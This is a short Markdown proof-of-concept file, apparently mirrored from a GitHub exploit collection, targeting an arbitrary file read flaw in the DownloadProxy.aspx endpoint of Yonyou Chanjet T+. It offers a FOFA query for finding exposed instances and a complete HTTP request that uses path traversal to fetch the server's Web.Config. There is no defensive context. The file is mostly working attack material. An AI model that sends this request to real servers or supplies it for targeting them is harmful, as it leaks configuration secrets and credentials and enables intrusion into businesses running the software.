mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 22:14:15 +00:00
20 lines
489 B
Markdown
20 lines
489 B
Markdown
![]() |
## 用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞
|
||
|
|
||
|
## fofa
|
||
|
```
|
||
|
app="畅捷通-TPlus"
|
||
|
```
|
||
|
|
||
|
|
||
|
## poc
|
||
|
```
|
||
|
GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1
|
||
|
X-Ajaxpro-Method: GetStoreWarehouseByStore
|
||
|
User-Agent: Java/1.8.0_381
|
||
|
Host: xx.xx.xx.xx
|
||
|
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
||
|
Connection: close
|
||
|
```
|
||
|
|
||
|

|